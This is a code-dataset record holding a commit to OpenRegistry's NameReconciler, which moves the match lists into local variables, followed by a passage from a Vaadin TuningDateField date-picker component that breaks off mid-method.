Rutgers-IDM/openregistry,Unicon/openregistry,Unicon/openregistry,Unicon/openregistry,sheliu/openregistry,Jasig/openregistry,msidd/openregistry,msidd/openregistry,Unicon/openregistry,msidd/openregistry,sheliu/openregistry,Rutgers-IDM/openregistry,Unicon/openregistry,Unicon/openregistry,sheliu/openregistry,Rutgers-IDM/openregistry,Jasig/openregistry,Jasig/openregistry,Jasig/openregistry,msidd/openregistry,sheliu/openregistry,msidd/openregistry,Rutgers-IDM/openregistry,Rutgers-IDM/openregistry,Jasig/openregistry,sheliu/openregistry,Jasig/openregistry,Unicon/openregistry
package org.openregistry.service.reconciliation; import java.util.ArrayList; import java.util.Collections; import java.util.List; import java.util.Set; import org.openregistry.core.domain.Name; import org.openregistry.core.domain.Person; import org.openregistry.core.domain.sor.PersonSearch; import org.openregistry.core.repository.PersonRepository; import org.openregistry.core.service.reconciliation.FieldMatch; import org.openregistry.core.service.reconciliation.PersonMatch; import org.openregistry.core.service.reconciliation.Reconciler; import org.openregistry.core.service.reconciliation.ReconciliationResult; import org.openregistry.core.service.reconciliation.ReconciliationResult.ReconciliationType; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Component; /** * Very simplistic Name Reconciler. Just for testing purposes. * * @author steiner * @version $Revision$ $Date$ */ @Component public final class NameReconciler implements Reconciler { private static final long serialVersionUID = -7509304431552307514L; @Autowired(required = true) private PersonRepository personRepository; protected final Logger logger = LoggerFactory.getLogger(getClass()); /* * @see org.openregistry.core.service.reconciliation.Reconciler#reconcile(org.openregistry.core.domain.sor.PersonSearch) */ public ReconciliationResult reconcile(PersonSearch personSearch) { List<PersonMatch> exactMatches = new ArrayList<PersonMatch>(); List<PersonMatch> partialMatches = new ArrayList<PersonMatch>(); Set<? extends Name> names = personSearch.getPerson().getNames(); // TODO deal with multiple names properly logger.info("Reconcile: found " + names.size() + " name(s)"); for(Name name: names) { logger.info("Reconcile: checking name: " + name.getGiven() + " " + name.getFamily()); List<Person> matches = this.personRepository.findByFamilyName(name.getFamily()); logger.info("Reconcile: found " + matches.size() + " possible match(es)"); for(Person match: matches) { if (name.getGiven().equals(match.getOfficialName().getGiven())) { // TODO use all names logger.info("Reconcile: found exact match: " + match.getOfficialName().getGiven() + " " + match.getOfficialName().getFamily()); exactMatches.add(new PersonMatchImpl(match, 100, Collections.<FieldMatch>emptyList())); } else { logger.info("Reconcile: found partial match: " + match.getOfficialName().getGiven() + " " + match.getOfficialName().getFamily()); partialMatches.add(new PersonMatchImpl(match, 50, Collections.<FieldMatch>emptyList())); } } } logger.info("Reconcile: finished matching: " + exactMatches.size() + "," + partialMatches.size()); if (exactMatches.isEmpty() && partialMatches.isEmpty()) { logger.info("Reconcile: returning NONE; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.NONE, Collections.<PersonMatch>emptyList()); } else if (! 
partialMatches.isEmpty()) { List<PersonMatch> matches = new ArrayList<PersonMatch>(); matches.addAll(exactMatches); matches.addAll(partialMatches); logger.info("Reconcile: returning MAYBE; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.MAYBE, matches); } else if (exactMatches.size() > 1) { logger.info("Reconcile: returning MAYBE; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.MAYBE, exactMatches); } else { logger.info("Reconcile: returning EXACT; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.EXACT, exactMatches); } } }
openregistry-service-impl/src/main/java/org/openregistry/service/reconciliation/NameReconciler.java
package org.openregistry.service.reconciliation; import java.util.ArrayList; import java.util.Collections; import java.util.List; import java.util.Set; import org.openregistry.core.domain.Name; import org.openregistry.core.domain.Person; import org.openregistry.core.domain.sor.PersonSearch; import org.openregistry.core.repository.PersonRepository; import org.openregistry.core.service.reconciliation.FieldMatch; import org.openregistry.core.service.reconciliation.PersonMatch; import org.openregistry.core.service.reconciliation.Reconciler; import org.openregistry.core.service.reconciliation.ReconciliationResult; import org.openregistry.core.service.reconciliation.ReconciliationResult.ReconciliationType; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Component; /** * Very simplistic Name Reconciler. Just for testing purposes. * * @author steiner * @version $Revision$ $Date$ */ @Component public final class NameReconciler implements Reconciler { @Autowired(required = true) private PersonRepository personRepository; private List<PersonMatch> exactMatches = new ArrayList<PersonMatch>(); private List<PersonMatch> partialMatches = new ArrayList<PersonMatch>(); protected final Logger logger = LoggerFactory.getLogger(getClass()); /* * @see org.openregistry.core.service.reconciliation.Reconciler#reconcile(org.openregistry.core.domain.sor.PersonSearch) */ public ReconciliationResult reconcile(PersonSearch personSearch) { Set<? extends Name> names = personSearch.getPerson().getNames(); // TODO deal with multiple names properly logger.info("Reconcile: found " + names.size() + " name(s)"); for(Name name: names) { logger.info("Reconcile: checking name: " + name.getGiven() + " " + name.getFamily()); List<Person> matches = this.personRepository.findByFamilyName(name.getFamily()); logger.info("Reconcile: found " + matches.size() + " possible match(es)"); for(Person match: matches) { if (name.getGiven().equals(match.getOfficialName().getGiven())) { // TODO use all names logger.info("Reconcile: found exact match: " + match.getOfficialName().getGiven() + " " + match.getOfficialName().getFamily()); exactMatches.add(new PersonMatchImpl(match, 100, Collections.<FieldMatch>emptyList())); } else { logger.info("Reconcile: found partial match: " + match.getOfficialName().getGiven() + " " + match.getOfficialName().getFamily()); partialMatches.add(new PersonMatchImpl(match, 50, Collections.<FieldMatch>emptyList())); } } } logger.info("Reconcile: finished matching: " + exactMatches.size() + "," + partialMatches.size()); if (exactMatches.isEmpty() && partialMatches.isEmpty()) { logger.info("Reconcile: returning NONE; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.NONE, Collections.<PersonMatch>emptyList()); } else if (! 
partialMatches.isEmpty()) { List<PersonMatch> matches = new ArrayList<PersonMatch>(); matches.addAll(exactMatches); matches.addAll(partialMatches); logger.info("Reconcile: returning MAYBE; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.MAYBE, matches); } else if (exactMatches.size() > 1) { logger.info("Reconcile: returning MAYBE; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.MAYBE, exactMatches); } else { logger.info("Reconcile: returning EXACT; " + exactMatches.size() + "," + partialMatches.size() + " matches found"); return new ReconciliationResultImpl(ReconciliationType.EXACT, exactMatches); } } }
NOJIRA don't reuse match lists git-svn-id: 996c6d7d570f9e8d676b69394667d4ecb3e4cdb3@17698 1580c273-15eb-1042-8a87-dc5d815c88a0
openregistry-service-impl/src/main/java/org/openregistry/service/reconciliation/NameReconciler.java
NOJIRA don't reuse match lists
<ide><path>penregistry-service-impl/src/main/java/org/openregistry/service/reconciliation/NameReconciler.java <ide> @Component <ide> public final class NameReconciler implements Reconciler { <ide> <add> private static final long serialVersionUID = -7509304431552307514L; <add> <ide> @Autowired(required = true) <ide> private PersonRepository personRepository; <del> <del> private List<PersonMatch> exactMatches = new ArrayList<PersonMatch>(); <del> private List<PersonMatch> partialMatches = new ArrayList<PersonMatch>(); <ide> <ide> protected final Logger logger = LoggerFactory.getLogger(getClass()); <ide> <ide> * @see org.openregistry.core.service.reconciliation.Reconciler#reconcile(org.openregistry.core.domain.sor.PersonSearch) <ide> */ <ide> public ReconciliationResult reconcile(PersonSearch personSearch) { <add> List<PersonMatch> exactMatches = new ArrayList<PersonMatch>(); <add> List<PersonMatch> partialMatches = new ArrayList<PersonMatch>(); <add> <ide> Set<? extends Name> names = personSearch.getPerson().getNames(); // TODO deal with multiple names properly <ide> logger.info("Reconcile: found " + names.size() + " name(s)"); <ide> for(Name name: names) {
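The "don't reuse match lists" fix above moves exactMatches and partialMatches from instance fields into locals of reconcile(), so matches from one call no longer accumulate into the results of the next. The stand-alone sketch below shows the difference between the two shapes; the class and method names are hypothetical and not the OpenRegistry API.

import java.util.ArrayList;
import java.util.List;

// Sketch of why accumulating into instance fields breaks repeated calls: the field
// keeps growing across invocations (and is shared between threads), while a local
// list starts empty every time.
public class LocalAccumulatorDemo {

    // Buggy shape: shared mutable state reused across calls.
    private final List<String> sharedMatches = new ArrayList<>();

    List<String> matchStateful(String name) {
        sharedMatches.add(name);          // never reset, grows forever
        return sharedMatches;
    }

    // Fixed shape: accumulate into a local list created per invocation.
    List<String> matchStateless(String name) {
        List<String> matches = new ArrayList<>();
        matches.add(name);
        return matches;
    }

    public static void main(String[] args) {
        LocalAccumulatorDemo demo = new LocalAccumulatorDemo();
        System.out.println(demo.matchStateful("Smith"));   // [Smith]
        System.out.println(demo.matchStateful("Jones"));   // [Smith, Jones]  <- stale result leaks in
        System.out.println(demo.matchStateless("Smith"));  // [Smith]
        System.out.println(demo.matchStateless("Jones"));  // [Jones]
    }
}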
Java
apache-2.0
34fea19929a7c5f934b1d99adc6075210bb5cc1a
0
fdreyfs/vaadin-tuning-datefield
/* * Copyright (C) 2013 Frederic Dreyfus * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.vaadin.addons.tuningdatefield; import java.lang.reflect.Method; import java.text.DateFormatSymbols; import java.util.Calendar; import java.util.Locale; import org.joda.time.DateTimeConstants; import org.joda.time.Days; import org.joda.time.LocalDate; import org.joda.time.Months; import org.joda.time.YearMonth; import org.joda.time.format.DateTimeFormat; import org.joda.time.format.DateTimeFormatter; import org.vaadin.addons.tuningdatefield.event.DateChangeEvent; import org.vaadin.addons.tuningdatefield.event.DateChangeListener; import org.vaadin.addons.tuningdatefield.event.MonthChangeEvent; import org.vaadin.addons.tuningdatefield.event.MonthChangeListener; import org.vaadin.addons.tuningdatefield.event.YearChangeEvent; import org.vaadin.addons.tuningdatefield.event.YearChangeListener; import org.vaadin.addons.tuningdatefield.widgetset.client.TuningDateFieldRpc; import org.vaadin.addons.tuningdatefield.widgetset.client.TuningDateFieldState; import org.vaadin.addons.tuningdatefield.widgetset.client.ui.calendar.CalendarItem; import org.vaadin.addons.tuningdatefield.widgetset.client.ui.calendar.CalendarResolution; import com.google.gwt.thirdparty.guava.common.base.Objects; import com.vaadin.data.Property; import com.vaadin.data.util.converter.Converter; import com.vaadin.data.util.converter.Converter.ConversionException; import com.vaadin.data.validator.RangeValidator; import com.vaadin.ui.AbstractField; import com.vaadin.ui.TextField; import com.vaadin.util.ReflectTools; /** * A date picker with a Joda {@link LocalDate} as model.<br /> * <p> * Usage:<br /> * * <pre> * TuningDateField tuningDateField = new TuningDateField(); * tuningDateField.setLocale(Locale.US); // optional * // A null range means no limit * tuningDateField.setDateRange(new LocalDate(2013, MAY, 10), new LocalDate(2013, JUNE, 5), &quot;The date must be between &quot; * + startDate + &quot; and &quot; + endDate); * tuningDateField.setLocalDate(new LocalDate(2013, MAY, 15)); * tuningDateField.setCellItemCustomizer(myTuningDateFieldCustomizer); // To customize cells of calendar * </pre> * * </p> * * <p> * The {@link TuningDateField} displays a {@link TextField} with proper LocalDate converter and a toggle button to * display a calendar.<br /> * The default converter will use a short format . You can set your own formatter using * {@link #setDateTimeFormatter(DateTimeFormatter)}. * </p> * <p> * To acess the {@link LocalDate} value of this field use the {@link #getLocalDate()} method which will return * <code>null</code> if the text value is null or if it is invalid. * </p> * * <p> * You can customize cells of the calendar using the {@link CellItemCustomizer} and its convenient default * {@link CellItemCustomizerAdapter}. 
<br /> * Example of a customizer which will apply even style to even days and odd styles for odd days in the calendar with * {@link CalendarResolution#DAY} resolution.<br /> * It will also disable the 25th of December 2013: * * <pre> * public class MyTuningDateFieldCustomizer extends TuningDateFieldCustomizerAdapter { * * &#064;Override * public String getStyle(LocalDate date, TuningDateField calendar) { * return date.getDayOfMonth() % 2 == 0 ? &quot;even&quot; : &quot;odd&quot;; * } * * &#064;Override * public boolean isEnabled(LocalDate date, TuningDateField calendar) { * if (date.equals(new LocalDate(2013, DECEMBER, 25))) { * return false; * } else { * return true; * } * } * } * </pre> * * </p> * * <p> * The primary stylename of the calendar is </code>tuning-datefield-calendar</code><br /> * <br /> * * CSS styles for calendar {@link CalendarResolution#DAY} : * <ul> * <li>today : if cell represents the current day</li> * <li>selected : if cell represents the selected day</li> * <li>currentmonth : if cell represents a day on current calendar month</li> * <li>previousmonth : if cell represents a day on previous calendar month</li> * <li>nextmonth : if cell represents a day on next calendar month</li> * <li>weekend : if cell represents a week-end</li> * <li>enabled : if cell is enabled</li> * <li>disabled : if cell is disabled</li> * </ul> * * CSS styles for calendar {@link CalendarResolution#MONTH} : * <ul> * <li>selected : if cell represents the selected month</li> * <li>currentmonth : if cell represents a day on current calendar month</li> * <li>enabled : if cell is enabled</li> * <li>disabled : if cell is disabled</li> * </ul> * * CSS styles for calendar {@link CalendarResolution#YEAR} : * <ul> * <li>selected : if cell represents the selected month</li> * <li>currentyear : if cell represents a day on current calendar month</li> * <li>enabled : if cell is enabled</li> * <li>disabled : if cell is disabled</li> * </ul> * * </p> * * * @author Frederic.Dreyfus * */ public class TuningDateField extends AbstractField<String> { private static final long serialVersionUID = 5261965803349750329L; /** * The cell item customizer which allows to customize calendar cells. */ private CellItemCustomizer cellItemCustomizer; /** * The date range validator if a range is defined * * @see #setDateRange(LocalDate, LocalDate, String) */ private RangeValidator<LocalDate> dateRangeValidator; // private boolean dayPicker = true; private CalendarResolution calendarResolution = CalendarResolution.DAY; /** * A dateTimeFormatter for parsing/printing dates. A default {@link DateTimeFormatter} is defined with short format * for current locale. This can be overriden using {@link #setDateTimeFormatter(DateTimeFormatter)} */ private DateTimeFormatter dateTimeFormatter; // True if the dateTimeFormatter is the default one and not a user defined private boolean defaultDateTimeFormatter = true; // Internal uses : the following 4 values are computed once at init and if the locale changes. private String[] monthTexts; // Jan, Feb, Mar private String[] shortMonthTexts; // Jan, Feb, Mar private String[] weekDayNames; // Sun, Mon, Tue, ... private int firstDayOfWeek; // 1 in France (monday), 7 in the US (sunday) private int lastDayOfWeek; // 7 in France (sunday), 6 in the US (saturday) /** * True to disable weekends. 
* * @see #setWeekendDisabled(boolean) */ private boolean weekendDisabled = true; /** * True to enable/disabled controls * * @see #setControlsEnabled(boolean) */ private boolean controlsEnabled = true; // Internal use : the month currently displayed in the calendar private YearMonth yearMonthDisplayed; // Internal use : the year currently displayed in the calendar private int yearDisplayed; // Internal use private boolean calendarOpen; public TuningDateField() { init(); setValue(null); } public TuningDateField(String caption) { this(); setCaption(caption); init(); } public TuningDateField(Property<?> dataSource) { this(null, dataSource); } public TuningDateField(String caption, Property<?> dataSource) { init(); setCaption(caption); setPropertyDataSource(dataSource); } public TuningDateField(String caption, LocalDate value) { init(); setCaption(caption); setLocalDate(value); } private void init() { setupLocaleBasedStaticData(getLocale()); initConverter(); setYearMonthDisplayed(YearMonth.now()); registerTuningDateFieldRpc(); addValueChangeListener(new ValueChangeListener() { private static final long serialVersionUID = -8632906562585439165L; @Override public void valueChange(com.vaadin.data.Property.ValueChangeEvent event) { fireEvent(new DateChangeEvent(TuningDateField.this, (LocalDate) getConvertedValue())); } }); } /** * Initialize the {@link LocalDate} converter for the text field. */ private void initConverter() { Converter<String, LocalDate> converter = new Converter<String, LocalDate>() { private static final long serialVersionUID = -2161506497954814519L; @Override public LocalDate convertToModel(String value, Class<? extends LocalDate> targetType, Locale locale) throws com.vaadin.data.util.converter.Converter.ConversionException { if (value == null) { return null; } LocalDate modelValue = null; try { modelValue = dateTimeFormatter.parseLocalDate(value); } catch (IllegalArgumentException e) { throw new ConversionException("Cannot convert to model"); } return modelValue; } @Override public String convertToPresentation(LocalDate value, Class<? extends String> targetType, Locale locale) throws com.vaadin.data.util.converter.Converter.ConversionException { if (value == null) { return null; } String presentationValue = null; try { presentationValue = dateTimeFormatter.print(value); } catch (IllegalArgumentException e) { throw new ConversionException("Cannot convert to presentation"); } return presentationValue; } @Override public Class<LocalDate> getModelType() { return LocalDate.class; } @Override public Class<String> getPresentationType() { return String.class; } }; setConverter(converter); } private void registerTuningDateFieldRpc() { registerRpc(new TuningDateFieldRpc() { private static final long serialVersionUID = 3572898507878457932L; @Override public void onCalendarOpen() { TuningDateField.this.onCalendarOpen(); markAsDirty(); } @Override public void onCalendarClosed() { calendarOpen = false; markAsDirty(); } @Override public void calendarItemClicked(Integer relativeDateIndex) { onCalendarItemClicked(relativeDateIndex); } @Override public void dateTextChanged(String dateText) { setValue(dateText); } @Override public void previousControlClicked() { if (controlsEnabled) { goToPreviousCalendarPage(); } else { // wtf ? should never happen } } @Override public void nextControlClicked() { if (controlsEnabled) { goToNextCalendarPage(); } else { // wtf ? 
should never happen } } @Override public void resolutionControlClicked() { if (controlsEnabled) { swithToHigherCalendarResolution(); } else { // wtf ? should never happen } } }); } public void setLocale(Locale locale) { super.setLocale(locale); // reinitialize static data based on locale (monthText, day names, etc...) boolean localeModified = Objects.equal(getLocale(), locale); if (localeModified) { setupLocaleBasedStaticData(locale); } } private void setupLocaleBasedStaticData(Locale locale) { if (locale == null) { locale = Locale.getDefault(); } if (defaultDateTimeFormatter) { dateTimeFormatter = DateTimeFormat.shortDate().withLocale(locale); } monthTexts = new DateFormatSymbols(locale).getMonths(); shortMonthTexts = new DateFormatSymbols(locale).getShortMonths(); firstDayOfWeek = getFirstDayOfWeek(locale); lastDayOfWeek = getLastDayOfWeek(locale); weekDayNames = getWeekDayNames(locale); } /** * Sets the date range of this tuningDateField * * @param startDate * the start date (included) * @param endDate * the end date (included) */ public void setDateRange(LocalDate startDate, LocalDate endDate, String errorMessage) { if (endDate.isBefore(startDate)) { throw new IllegalArgumentException("Cannot have a date range with end date " + endDate + " before start date " + startDate); } // set validator for date range if (dateRangeValidator != null) { removeValidator(dateRangeValidator); } dateRangeValidator = new RangeValidator<LocalDate>(errorMessage, LocalDate.class, startDate, endDate); addValidator(dateRangeValidator); markAsDirty(); } /** * Returns <code>true</code> if : * <ol> * <li>date is in range</li> * <li>date is not a week-end, or if it is then week-ends are not disabled</li> * <li>date is not disabled by {@link CellItemCustomizer}</li> * </ol> * * @param date * the date * @return <code>true</code> if date is enabled, else returns <code>false</code> */ protected boolean isDateEnabled(LocalDate date) { boolean enabled = false; enabled = isDateInRange(date); if (!enabled) { return enabled; } if (isWeekend(date) && isWeekendDisabled()) { return false; } if (enabled && cellItemCustomizer != null) { enabled = cellItemCustomizer.isEnabled(date, this); } return enabled; } /** * Returns <code>true</code> if date is in range, else returns <code>false</code> * * @param date * the date. * @return <code>true</code> if date is in range, else returns <code>false</code> */ private boolean isDateInRange(LocalDate date) { if (dateRangeValidator == null) { return true; } else { return dateRangeValidator.isValid(date); } } /** * <code>true</code> if date is a week-end, else returns <code>false</code>. <br /> * Override this method for custom week-ends days. 
* * @param date * the date * @return <code>true</code> if date is a week-end, else returns <code>false</code> */ protected boolean isWeekend(LocalDate date) { return date.getDayOfWeek() >= DateTimeConstants.SATURDAY; } @Override public TuningDateFieldState getState() { return (TuningDateFieldState) super.getState(); } @Override public void beforeClientResponse(boolean initial) { super.beforeClientResponse(initial); // For days of first week that are in previous month // Get first day of week of last week's previous month if (getValue() != null) { getState().setDisplayedDateText(getValue()); } getState().setCalendarOpen(calendarOpen); // We send calendar state only if it's open if (calendarOpen) { getState().setControlsEnabled(controlsEnabled); getState().setCalendarResolution(calendarResolution); if (calendarResolution.equals(CalendarResolution.DAY)) { YearMonth yearMonthDisplayed = getYearMonthDisplayed(); String displayedMonthText = monthTexts[yearMonthDisplayed.getMonthOfYear() - 1]; getState().setCalendarResolutionText(displayedMonthText + " " + yearMonthDisplayed.getYear()); getState().setWeekHeaderNames(weekDayNames); getState().setCalendarItems(buildDayItems()); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { getState().setCalendarItems(buildMonthItems()); getState().setCalendarResolutionText(Integer.toString(yearMonthDisplayed.getYear())); } else if (calendarResolution.equals(CalendarResolution.YEAR)) { getState().setCalendarItems(buildYearItems()); getState().setCalendarResolutionText(getCalendarFirstYear() + " - " + getCalendarLastYear()); } } } private CalendarItem[] buildDayItems() { LocalDate calendarFirstDay = getCalendarFirstDay(); LocalDate calendarLastDay = getCalendarLastDay(); LocalDate firstDayOfMonth = yearMonthDisplayed.toLocalDate(1); LocalDate lastDayOfMonth = yearMonthDisplayed.toLocalDate(1).dayOfMonth().withMaximumValue(); LocalDate today = LocalDate.now(); int numberOfDays = Days.daysBetween(calendarFirstDay, calendarLastDay).getDays() + 1; LocalDate date = calendarFirstDay; CalendarItem[] calendarItems = new CalendarItem[numberOfDays]; LocalDate currentValue = getLocalDate(); for (int i = 0; i < numberOfDays; i++, date = date.plusDays(1)) { calendarItems[i] = new CalendarItem(); calendarItems[i].setIndex(i); calendarItems[i].setRelativeDateIndex(date.getDayOfMonth()); calendarItems[i].setText(Integer.toString(date.getDayOfMonth())); StringBuilder style = new StringBuilder(); if (date.equals(today)) { style.append("today "); } if (currentValue != null && date.equals(currentValue)) { style.append("selected "); } if (date.isBefore(firstDayOfMonth)) { style.append("previousmonth "); calendarItems[i].setEnabled(false); } else if (date.isAfter(lastDayOfMonth)) { style.append("nextmonth "); calendarItems[i].setEnabled(false); } else { style.append("currentmonth "); calendarItems[i].setEnabled(true); } if (isWeekend(date)) { style.append("weekend "); } if (cellItemCustomizer != null) { String generatedStyle = cellItemCustomizer.getStyle(date, this); if (generatedStyle != null) { style.append(generatedStyle); style.append(" "); } String tooltip = cellItemCustomizer.getTooltip(date, this); if (tooltip != null) { calendarItems[i].setTooltip(tooltip); } } if (isDateEnabled(date)) { calendarItems[i].setEnabled(true); } else { calendarItems[i].setEnabled(false); } String computedStyle = style.toString(); if (!computedStyle.isEmpty()) { calendarItems[i].setStyle(computedStyle); } } return calendarItems; } private CalendarItem[] buildMonthItems() { YearMonth 
calendarFirstMonth = getCalendarFirstMonth(); YearMonth calendarLastMonth = getCalendarLastMonth(); YearMonth currentMonth = YearMonth.now(); int numberOfMonths = Months.monthsBetween(calendarFirstMonth, calendarLastMonth).getMonths() + 1; CalendarItem[] calendarItems = new CalendarItem[numberOfMonths]; YearMonth month = calendarFirstMonth; LocalDate currentValue = getLocalDate(); YearMonth currentYearMonthValue = currentValue == null ? null : new YearMonth(currentValue.getYear(), currentValue.getMonthOfYear()); for (int i = 0; i < numberOfMonths; i++, month = month.plusMonths(1)) { calendarItems[i] = new CalendarItem(); calendarItems[i].setIndex(i); calendarItems[i].setRelativeDateIndex(month.getMonthOfYear()); calendarItems[i].setEnabled(true); // By default StringBuilder style = new StringBuilder(""); if (month.equals(currentMonth)) { style.append("currentmonth "); } if (currentYearMonthValue != null && month.equals(currentYearMonthValue)) { style.append("selected "); } if (cellItemCustomizer != null) { String generatedStyle = cellItemCustomizer.getStyle(month, this); if (generatedStyle != null) { style.append(generatedStyle); style.append(" "); } String tooltip = cellItemCustomizer.getTooltip(month, this); if (tooltip != null) { calendarItems[i].setTooltip(tooltip); } } if (isMonthEnabled(month)) { calendarItems[i].setEnabled(true); } String computedStyle = style.toString(); if (!computedStyle.isEmpty()) { calendarItems[i].setStyle(computedStyle); } calendarItems[i].setText(shortMonthTexts[i]); } return calendarItems; } private CalendarItem[] buildYearItems() { int calendarFirstYear = getCalendarFirstYear(); int calendarLastYear = getCalendarLastYear(); int currentYear = YearMonth.now().getYear(); int numberOfYears = calendarLastYear - calendarFirstYear + 1; CalendarItem[] calendarItems = new CalendarItem[numberOfYears]; int year = calendarFirstYear; LocalDate currentValue = getLocalDate(); Integer currentYearValue = currentValue == null ? null : currentValue.getYear(); for (int i = 0; i < numberOfYears; i++, year++) { calendarItems[i] = new CalendarItem(); calendarItems[i].setIndex(i); calendarItems[i].setRelativeDateIndex(year); calendarItems[i].setEnabled(true); StringBuilder style = new StringBuilder(""); if (year == currentYear) { style.append("currentyear "); } if (currentYearValue != null && year == currentYearValue) { style.append("selected "); } if (isYearEnabled(year)) { calendarItems[i].setEnabled(true); } if (cellItemCustomizer != null) { String generatedStyle = cellItemCustomizer.getStyle(year, this); if (generatedStyle != null) { style.append(generatedStyle); style.append(" "); } String tooltip = cellItemCustomizer.getTooltip(year, this); if (tooltip != null) { calendarItems[i].setTooltip(tooltip); } } String computedStyle = style.toString(); if (!computedStyle.isEmpty()) { calendarItems[i].setStyle(computedStyle); } calendarItems[i].setText(Integer.toString(year)); } return calendarItems; } /** * Sets the localDate value of this field. * * @param localDate * the localDate */ public void setLocalDate(LocalDate localDate) { setConvertedValue(localDate); } /** * As the value of the field is a String, the representation may be corrupted to be parsed into a {@link LocalDate}. * In that case we return <code>null</code>. * * @return the localDate value of this field if defined and valid, else returns <code>null</code>. 
*/ public LocalDate getLocalDate() { try { return (LocalDate) getConvertedValue(); } catch (ConversionException e) { // In that case the value is invalid return null; } } /** * @return the first day of the calendar. As there are 7 columns displayed, if the first day of month is not in the * first column, we fill previous column items with days of previous month. */ private LocalDate getCalendarFirstDay() { LocalDate firstDayOfMonth = yearMonthDisplayed.toLocalDate(1); int calendarFirstDayOfWeek = firstDayOfWeek; int numberOfDaysSinceFirstDayOfWeek = (firstDayOfMonth.getDayOfWeek() - calendarFirstDayOfWeek + 7) % 7; return firstDayOfMonth.minusDays(numberOfDaysSinceFirstDayOfWeek); } /** * @return the last day of the calendar. As there are 7 columns displayed, if the last day of month is not in the * last column, we fill next column items with days of next month. */ private LocalDate getCalendarLastDay() { LocalDate lastDayOfMonth = yearMonthDisplayed.toLocalDate(1).dayOfMonth().withMaximumValue(); int calendarLastDayOfWeek = lastDayOfWeek; int numberOfDaysUntilLastDayOfWeek = (calendarLastDayOfWeek - lastDayOfMonth.getDayOfWeek() + 7) % 7; return lastDayOfMonth.plusDays(numberOfDaysUntilLastDayOfWeek); } private YearMonth getCalendarFirstMonth() { return new YearMonth(yearDisplayed, 1); } private YearMonth getCalendarLastMonth() { return new YearMonth(yearDisplayed, 12); } /** * If current year displayed is 1954, the range is 1949-1960 */ private int getCalendarFirstYear() { return yearDisplayed - yearDisplayed % 10 - 1; } /** * If current year displayed is 1954, the range is 1949-1960 */ private int getCalendarLastYear() { return yearDisplayed - yearDisplayed % 10 + 10; } private LocalDate getSelectedDate(int dayOfMonth) { return yearMonthDisplayed.toLocalDate(dayOfMonth); } private YearMonth getSelectedMonth(int monthOfYear) { return new YearMonth(yearDisplayed, monthOfYear); } /** * Called when the calendar is open on client-side */ private void onCalendarOpen() { calendarResolution = CalendarResolution.DAY; LocalDate currentValue = getLocalDate(); if (currentValue != null) { yearMonthDisplayed = new YearMonth(currentValue); } else { yearMonthDisplayed = YearMonth.now(); } calendarOpen = true; } /** * Called when user clicked on cell item * * @param relativeDateIndex * is dayOfMonth in day resolution, monthOfYear in month resolution, year in year resolution */ protected void onCalendarItemClicked(int relativeDateIndex) { if (calendarResolution.equals(CalendarResolution.DAY)) { if (isDateEnabled(getSelectedDate(relativeDateIndex))) { // We check the date is not disabled LocalDate selectedDate = getSelectedDate(relativeDateIndex); setConvertedValue(selectedDate); // Should now close the calendar calendarOpen = false; } } else if (calendarResolution.equals(CalendarResolution.MONTH)) { if (isMonthEnabled(getSelectedMonth(relativeDateIndex))) { YearMonth selectedMonth = getSelectedMonth(relativeDateIndex); setYearMonthDisplayed(selectedMonth); setCalendarResolution(CalendarResolution.DAY); fireEvent(new MonthChangeEvent(this, selectedMonth)); } } else if (calendarResolution.equals(CalendarResolution.YEAR)) { if(isYearEnabled(relativeDateIndex)) { setYearMonthDisplayed(new YearMonth(relativeDateIndex, getYearMonthDisplayed().getMonthOfYear())); setCalendarResolution(CalendarResolution.MONTH); } } } /** * Called when user clicked on the next page control */ public void goToNextCalendarPage() { if (calendarResolution.equals(CalendarResolution.DAY)) { 
setYearMonthDisplayed(yearMonthDisplayed.plusMonths(1)); fireEvent(new MonthChangeEvent(this, yearMonthDisplayed)); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { setYearMonthDisplayed(yearMonthDisplayed.plusYears(1)); fireEvent(new YearChangeEvent(this, yearDisplayed)); } else if (calendarResolution.equals(CalendarResolution.YEAR)) { setYearMonthDisplayed(yearMonthDisplayed.plusYears(10)); } } /** * Called when user clicked on the previous page control */ public void goToPreviousCalendarPage() { if (calendarResolution.equals(CalendarResolution.DAY)) { setYearMonthDisplayed(yearMonthDisplayed.minusMonths(1)); fireEvent(new MonthChangeEvent(this, yearMonthDisplayed)); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { setYearMonthDisplayed(yearMonthDisplayed.minusYears(1)); fireEvent(new YearChangeEvent(this, yearDisplayed)); } else if (calendarResolution.equals(CalendarResolution.YEAR)) { setYearMonthDisplayed(yearMonthDisplayed.minusYears(10)); } } /** * Called when user clicked on the resolution control */ public void swithToHigherCalendarResolution() { if (calendarResolution.equals(CalendarResolution.DAY)) { setCalendarResolution(CalendarResolution.MONTH); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { setCalendarResolution(CalendarResolution.YEAR); } markAsDirty(); } /** * Returns true if month is enabled. Default implementations returns {@link CellItemCustomizer} value if any. * * @param yearMonth * the month * @return true if month is enabled. */ protected boolean isMonthEnabled(YearMonth yearMonth) { if (cellItemCustomizer != null) { return cellItemCustomizer.isEnabled(yearMonth, this); } return true; } /** * Returns true if year is enabled. Default implementations returns {@link CellItemCustomizer} value if any. * * @param year * the year * @return true if year is enabled. */ protected boolean isYearEnabled(int year) { if 